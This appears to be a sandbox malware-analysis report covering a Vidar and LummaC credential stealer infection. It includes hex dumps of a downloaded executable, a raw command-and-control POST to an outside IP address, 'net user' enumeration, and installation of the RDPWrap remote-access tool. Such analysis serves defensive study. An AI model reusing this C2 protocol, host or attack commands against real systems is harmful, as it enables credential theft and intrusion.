                                                                                    2024-09-26 22:15:49 UTC263INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:49 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 2459136
                                                                                    Connection: close
                                                                                    Last-Modified: Thursday, 26-Sep-2024 22:15:49 GMT
                                                                                    Cache-Control: no-store, no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    2024-09-26 22:15:49 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                    2024-09-26 22:15:49 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                    Data Ascii: %:X~e!*FW|>|L1146
                                                                                    2024-09-26 22:15:50 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                    Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                    2024-09-26 22:15:50 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                    Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                    2024-09-26 22:15:50 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                    Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                    2024-09-26 22:15:50 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                    Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                    2024-09-26 22:15:50 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                    Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                    2024-09-26 22:15:50 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                    Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                    2024-09-26 22:15:50 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                    Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                    2024-09-26 22:15:50 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                    Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.2.4497945.75.211.1624431144C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:15:52 UTC278OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 4677
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:15:52 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JJJKFBAAAFHJEBFIEGIDCont
                                                                                    2024-09-26 22:15:53 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:15:53 UTC15INData Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 5block0


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:18:14:03
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                    Imagebase:0x830000
                                                                                    File size:413'224 bytes
                                                                                    MD5 hash:F73186DF5A030CF7F186B0737C3AF1F7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:18:14:03
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:18:14:03
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    Imagebase:0x10000
                                                                                    File size:65'440 bytes
                                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:18:15:05
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\ProgramData\IDBAFHDGDG.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\ProgramData\IDBAFHDGDG.exe"
                                                                                    Imagebase:0x100000
                                                                                    File size:385'064 bytes
                                                                                    MD5 hash:47697A60A96C5ADEF362D8DA9A274B7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:18:15:05
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:18:15:06
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    Imagebase:0x4f0000
                                                                                    File size:65'440 bytes
                                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:18:15:08
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\ProgramData\GIIIIJDHJE.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\ProgramData\GIIIIJDHJE.exe"
                                                                                    Imagebase:0x3c0000
                                                                                    File size:413'224 bytes
                                                                                    MD5 hash:F73186DF5A030CF7F186B0737C3AF1F7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 42%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:18:15:08
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:18:15:08
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    Imagebase:0x760000
                                                                                    File size:65'440 bytes
                                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:18:15:10
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\ProgramData\AFHDGDGIID.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\ProgramData\AFHDGDGIID.exe"
                                                                                    Imagebase:0xb90000
                                                                                    File size:73'216 bytes
                                                                                    MD5 hash:8C46913FBA5CA6A0CB8C4E839EF3A3AE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\AFHDGDGIID.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:18:15:10
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"cmd.exe" /c net user
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:18:15:10
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:18:15:11
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:net user
                                                                                    Imagebase:0xb30000
                                                                                    File size:47'104 bytes
                                                                                    MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:18:15:11
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\net1 user
                                                                                    Imagebase:0x520000
                                                                                    File size:139'776 bytes
                                                                                    MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:18:15:13
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:18:15:13
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:18:15:14
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                                                    Imagebase:0x400000
                                                                                    File size:1'785'344 bytes
                                                                                    MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:Borland Delphi
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000013.00000002.2487557862.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
